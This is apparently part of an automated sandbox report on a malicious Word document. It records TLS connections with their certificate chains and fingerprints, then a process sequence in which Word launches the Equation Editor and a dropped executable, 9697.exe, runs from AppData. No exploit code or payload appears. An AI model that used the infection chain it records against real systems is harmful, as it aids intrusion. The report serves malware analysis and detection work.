                                                                                                                                                                                                              May 12, 2021 15:16:22.282493114 CEST104.16.18.94443192.168.2.2249194CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Oct 21 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Thu Oct 21 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                              May 12, 2021 15:16:22.283097982 CEST104.16.18.94443192.168.2.2249195CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Oct 21 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Thu Oct 21 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                              May 12, 2021 15:21:05.998893023 CEST192.229.221.185443192.168.2.2249273CN=identitycdn.msauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Jul 20 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013 Fri Nov 10 01:00:00 CET 2006Tue Jul 20 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023 Mon Nov 10 01:00:00 CET 2031771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                              CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                                              May 12, 2021 15:21:05.998953104 CEST192.229.221.185443192.168.2.2249272CN=identitycdn.msauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Jul 20 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013 Fri Nov 10 01:00:00 CET 2006Tue Jul 20 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023 Mon Nov 10 01:00:00 CET 2031771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                              CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                                              May 12, 2021 15:21:07.626092911 CEST152.199.21.175443192.168.2.2249287CN=sni1e6ffgl.wpc.edgecastcdn.net, OU=SecOps, O="Verizon Digital Media Services, Inc.", L=Los Angeles, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Apr 16 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Thu Apr 21 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                              May 12, 2021 15:21:07.629653931 CEST152.199.21.175443192.168.2.2249288CN=sni1e6ffgl.wpc.edgecastcdn.net, OU=SecOps, O="Verizon Digital Media Services, Inc.", L=Los Angeles, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Apr 16 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Thu Apr 21 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                              May 12, 2021 15:21:38.100363970 CEST34.252.156.174443192.168.2.2249344CN=target.microsoft.com, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Feb 05 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013 Fri Nov 10 01:00:00 CET 2006Wed Feb 09 13:00:00 CET 2022 Sun Oct 22 14:00:00 CEST 2028 Mon Nov 10 01:00:00 CET 2031771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                              CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                                              May 12, 2021 15:21:39.375159025 CEST185.60.216.6443192.168.2.2249345CN=*.atlassolutions.com, O="Facebook, Inc.", L=Menlo Park, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 26 01:00:00 CET 2021 Tue Oct 22 14:00:00 CEST 2013Fri Jun 25 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                              May 12, 2021 15:21:39.377048016 CEST185.60.216.6443192.168.2.2249346CN=*.atlassolutions.com, O="Facebook, Inc.", L=Menlo Park, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 26 01:00:00 CET 2021 Tue Oct 22 14:00:00 CEST 2013Fri Jun 25 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                              May 12, 2021 15:21:40.304461002 CEST52.210.171.182443192.168.2.2249351CN=*.demdex.net, OU=Digital Marketing, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Dec 02 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006Mon Jan 03 00:59:59 CET 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                              CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                                              May 12, 2021 15:21:41.481728077 CEST142.250.185.102443192.168.2.2249356CN=*.doubleclick.net CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BETue Apr 13 12:36:31 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020Tue Jul 06 12:36:30 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=GTS CA 1C3, O=Google Trust Services LLC, C=USCN=GTS Root R1, O=Google Trust Services LLC, C=USThu Aug 13 02:00:42 CEST 2020Thu Sep 30 02:00:42 CEST 2027
                                                                                                                                                                                                              CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Jun 19 02:00:42 CEST 2020Fri Jan 28 01:00:42 CET 2028
                                                                                                                                                                                                              May 12, 2021 15:21:41.484492064 CEST142.250.185.102443192.168.2.2249355CN=*.doubleclick.net CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BETue Apr 13 12:36:31 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020Tue Jul 06 12:36:30 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=GTS CA 1C3, O=Google Trust Services LLC, C=USCN=GTS Root R1, O=Google Trust Services LLC, C=USThu Aug 13 02:00:42 CEST 2020Thu Sep 30 02:00:42 CEST 2027
                                                                                                                                                                                                              CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Jun 19 02:00:42 CEST 2020Fri Jan 28 01:00:42 CET 2028
                                                                                                                                                                                                              May 12, 2021 15:21:41.938186884 CEST185.60.216.19443192.168.2.2249357CN=*.facebook.com, O="Facebook, Inc.", L=Menlo Park, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Apr 06 02:00:00 CEST 2021 Tue Oct 22 14:00:00 CEST 2013Sun Jul 04 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                              May 12, 2021 15:21:41.942728043 CEST185.60.216.19443192.168.2.2249358CN=*.facebook.com, O="Facebook, Inc.", L=Menlo Park, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Apr 06 02:00:00 CEST 2021 Tue Oct 22 14:00:00 CEST 2013Sun Jul 04 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                              May 12, 2021 15:21:43.181509018 CEST172.217.168.66443192.168.2.2249362CN=*.google.ch, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Apr 13 12:18:39 CEST 2021 Thu Jun 15 02:00:42 CEST 2017Tue Jul 06 12:18:38 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                              May 12, 2021 15:21:43.182384014 CEST172.217.168.66443192.168.2.2249361CN=*.google.ch, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Apr 13 12:18:39 CEST 2021 Thu Jun 15 02:00:42 CEST 2017Tue Jul 06 12:18:38 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                              May 12, 2021 15:21:43.561167955 CEST34.251.174.164443192.168.2.2249364CN=c.clicktale.net CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USTue Oct 13 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Fri Nov 12 13:00:00 CET 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                              May 12, 2021 15:21:43.566163063 CEST34.251.174.164443192.168.2.2249363CN=c.clicktale.net CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USTue Oct 13 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Fri Nov 12 13:00:00 CET 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                              May 12, 2021 15:21:44.009120941 CEST52.45.173.110443192.168.2.2249365CN=*.clicktale.net CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USFri Jul 17 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Tue Aug 17 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:15:38
                                                                                                                                                                                                              Start date:12/05/2021
                                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                                                                              Imagebase:0x13f530000
                                                                                                                                                                                                              File size:1424032 bytes
                                                                                                                                                                                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:15:39
                                                                                                                                                                                                              Start date:12/05/2021
                                                                                                                                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:543304 bytes
                                                                                                                                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:15:48
                                                                                                                                                                                                              Start date:12/05/2021
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              Imagebase:0x1310000
                                                                                                                                                                                                              File size:19463448 bytes
                                                                                                                                                                                                              MD5 hash:AA2AD37BB74C05A49417E3D2F1BD89CE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:15:52
                                                                                                                                                                                                              Start date:12/05/2021
                                                                                                                                                                                                              Path:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:'C:\$Windows.~WS\Sources\SetupHost.Exe' /Download /Web
                                                                                                                                                                                                              Imagebase:0x980000
                                                                                                                                                                                                              File size:699192 bytes
                                                                                                                                                                                                              MD5 hash:A5D94F9587F97E9C674447447721B77F
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                              • Detection: 0%, Metadefender, Browse
                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:15:54
                                                                                                                                                                                                              Start date:12/05/2021
                                                                                                                                                                                                              Path:C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                                              Imagebase:0xffe20000
                                                                                                                                                                                                              File size:22528 bytes
                                                                                                                                                                                                              MD5 hash:5225207BDE8C090CE92A18C61180650C
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
